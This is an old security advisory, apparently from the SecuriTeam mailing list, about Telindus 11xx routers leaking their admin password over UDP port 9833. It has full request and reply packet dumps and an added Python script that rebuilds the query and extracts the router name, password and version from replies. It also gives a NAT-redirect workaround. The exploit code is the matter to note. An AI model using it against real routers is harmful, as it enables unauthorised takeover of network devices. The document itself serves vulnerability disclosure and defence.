[NEWS] Vulnerabilities Found in Telindus 11xx Router Series

From: support@securiteam.com
Date: 06/19/02



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Vulnerabilities Found in Telindus 11xx Router Series
------------------------------------------------------------------------

SUMMARY

The 11xx router series by Telindus (<http://www.telindus.com>) has a very
serious, remotely exploitable vulnerability: an intruder who mimics the
behaviour of the desktop management application obtains the router's
administrative password, and with it control of the router.

DETAILS

The 11xx router series has a management program, freely downloadable from
the Telindus site, that allows an administrator to manage the router
remotely.

This program discovers router boxes on the LAN by UDP broadcast. It then
sends a different UDP unicast packet to each box that answers, and the
router replies with a UDP packet that contains, among other things, the
software revision number, the router name and the password for accessing
the device.

All of this information is sent in clear text, and all of the traffic uses
UDP port 9833 (as both source and destination port in the dumps below). The
router does not authenticate the requester in any way.

This behaviour can be exploited in many ways. On a LAN it is enough to
download and run the administration tool while sniffing the traffic. Across
a WAN it is enough to craft a packet that queries the router in the same
way the management program does: the reply, password included, comes back
to whoever asked.

As an example, this is the complete dump (with the Ethernet frame) of a
``request'' packet. The payload is the last 54 bytes, beginning with ``19
73 04'' (the UDP length field, 00 3E = 62, counts the 8-byte UDP header as
well). The sender address is 172.16.0.16, the router (recipient) is
172.16.0.253, and source and destination port are both 9833 (26 69):

00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00
00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10
00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30
00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16
04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26
01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF

This is the dump of an ``answer'' packet (with the Ethernet frame). The
payload is the last 196 bytes, beginning with ``19 73 04'' (UDP length
00 CC = 204, again including the 8-byte header). The password has been
replaced by ``xx''.

00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00
00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10
00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30
00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00
0D xx xx xx xx xx xx xx xx xx xx xx xx xx 01 02
00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20
76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20
44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20
32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60
6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08
00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00
00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00
40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00
01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44
00 00 42 05 00 00 42 22 00 00 04 18 00 00
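
The two dumps above are enough to rebuild the exchange offline. Reading them side by side, the request is the 6-byte preamble ``19 73 04 17 73 30'', the bytes ``00 01 00 01'', a list of 2-byte attribute tags, and an ``FF FF'' terminator; the reply repeats the preamble with ``00 03'' in place of the first ``00 01'' and then echoes every requested tag as tag(2) length(2) value. The fields of length 00 05, 00 0D (the 13 ``xx'' bytes) and 00 32 are the router name, the password and the version string respectively. The Python below is an added example and not part of the advisory: it rebuilds the request payload byte for byte, strips the Ethernet/IP/UDP headers from a captured frame, walks the reply's records and pulls out what a sniffer (or a remote attacker who sent the same request) learns. The ``00 01''/``00 03'' reading as request/reply type, the three tag names and the 13-byte placeholder standing in for the redacted password are assumptions made for this example; the rest is copied from the dumps.

```python
import struct

PORT = 9833
PREAMBLE = bytes.fromhex("19 73 04 17 73 30")   # fixed 6 bytes opening both payloads

# Attribute tags the management tool asks for, in the order of the request dump.
REQUEST_TAGS = [0x0100, 0x0101, 0x0102, 0x0133, 0x0113, 0x0116, 0x0408,
                0x0415, 0x010D, 0x010E, 0x0114, 0x4003, 0x4004, 0x0126,
                0x0127, 0x0128, 0x0130, 0x0144, 0x4205, 0x4222, 0x0418]

# Assumed names for the three tags whose reply values are readable in the dump.
TAG_NAMES = {0x0100: "router_name", 0x0101: "password", 0x0102: "version"}

# Request frame copied from the advisory (Ethernet + IPv4 + UDP + 54-byte payload).
REQUEST_FRAME = bytes.fromhex("""
00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00
00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10
00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30
00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16
04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26
01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF
""")

# Reply frame from the advisory. The 13 redacted "xx" bytes are replaced by a
# constructed placeholder of the same length so the dump stays byte-exact.
PASSWORD_PLACEHOLDER = b"REDACTED-PWD1"          # 13 bytes, matches length 00 0D
RESPONSE_FRAME = (bytes.fromhex("""
00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00
00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10
00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30
00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00
0D""") + PASSWORD_PLACEHOLDER + bytes.fromhex("""01 02
00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20
76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20
44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20
32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60
6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08
00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00
00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00
40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00
01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44
00 00 42 05 00 00 42 22 00 00 04 18 00 00
"""))


def build_request(tags=REQUEST_TAGS) -> bytes:
    """Rebuild the query payload: preamble, 00 01 (taken to be the request type),
    00 01, one 2-byte tag per attribute wanted, FF FF terminator."""
    return (PREAMBLE + b"\x00\x01\x00\x01"
            + b"".join(struct.pack(">H", t) for t in tags) + b"\xff\xff")


def udp_datagram(frame: bytes):
    """Peel Ethernet/IPv4/UDP off a raw frame; return src, dst, sport, dport, payload."""
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4 frame")
    ihl = (frame[14] & 0x0F) * 4
    ip = frame[14:14 + ihl]
    if ip[9] != 17:
        raise ValueError("not UDP")
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    udp = frame[14 + ihl:]
    sport, dport, ulen = struct.unpack(">HHH", udp[:6])
    if ulen < 8 or ulen > len(udp):
        raise ValueError("bad UDP length")
    return src, dst, sport, dport, udp[8:ulen]    # UDP length counts its own 8-byte header


def parse_response(payload: bytes) -> dict:
    """Walk the reply as tag(2) length(2) value(length) records after the 10-byte header."""
    if payload[:6] != PREAMBLE or payload[6:8] != b"\x00\x03":
        raise ValueError("not a 00 03 reply")
    fields, off = {}, 10
    while off + 4 <= len(payload):
        tag, length = struct.unpack(">HH", payload[off:off + 4])
        off += 4
        if off + length > len(payload):
            raise ValueError("truncated record value")
        fields[tag] = payload[off:off + length]
        off += length
    if off != len(payload):
        raise ValueError("trailing bytes after last record")
    return fields


def leaked_credentials(frame: bytes) -> dict:
    """What a sniffer (or a WAN attacker who sent build_request()) learns from one reply."""
    src, _dst, sport, dport, payload = udp_datagram(frame)
    if PORT not in (sport, dport):
        raise ValueError("not management traffic on port 9833")
    fields = parse_response(payload)
    out = {"router": src}
    for tag, name in TAG_NAMES.items():
        if tag in fields:
            out[name] = fields[tag].decode("ascii", "replace")
    return out
```

Running `leaked_credentials(RESPONSE_FRAME)` yields the router address 172.16.0.253, the name ``EQCAY'', the (placeholder) password and the version string ``ND1060VE-TLI, ver 5.3.11B;Thu Dec  6 16:36:33 2001''; `build_request()` reproduces the 54-byte payload of the request dump exactly, which is all a remote attacker needs to send to UDP/9833. The same parser, fed frames from a capture, also serves as a detection check for management replies leaving the LAN.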

Solution:
We have not been able to find out whether this ``feature'' can be disabled.
Failing that, the only solution seems to be to filter traffic to UDP port
9833 directed at the box.

A quick and dirty workaround is to redirect WAN traffic to port 9833/udp to
another IP address on the LAN, preferably an unused one. This can be done
by connecting to the router via telnet, logging in, and issuing the
command ``add auto udp 9833 9833 9833 10.0.0.10'', where 10.0.0.10 is an
unused IP address on your LAN. This sets up a static NAT rule that
redirects matching traffic entering the WAN interface. Then you must also
enter the command ``save'' to write the configuration to NVRAM. You can
optionally check the NAT table with ``show auto''. If you make a mistake,
``del auto <number>'' removes the rule and you can retry. Note that this
only diverts queries arriving on the WAN interface: on the LAN, anyone able
to sniff the segment still sees the reply, password included, in clear
text. Maybe there are better methods; we used this one because we already
knew how to use the ``auto'' command.

Vendor status:
We contacted Telindus through their Italian office. They told us that
they are actively working on this issue. We told them that after a month
we would inform the security community of the problem.

Telindus told us that a beta version of the firmware should be available
soon. Last but not least, the banner of the router has the word Arescom in
it, so perhaps other devices from that vendor are exploitable.

ADDITIONAL INFORMATION

The information has been provided by <mailto:finelli@ieee.org> finelli.
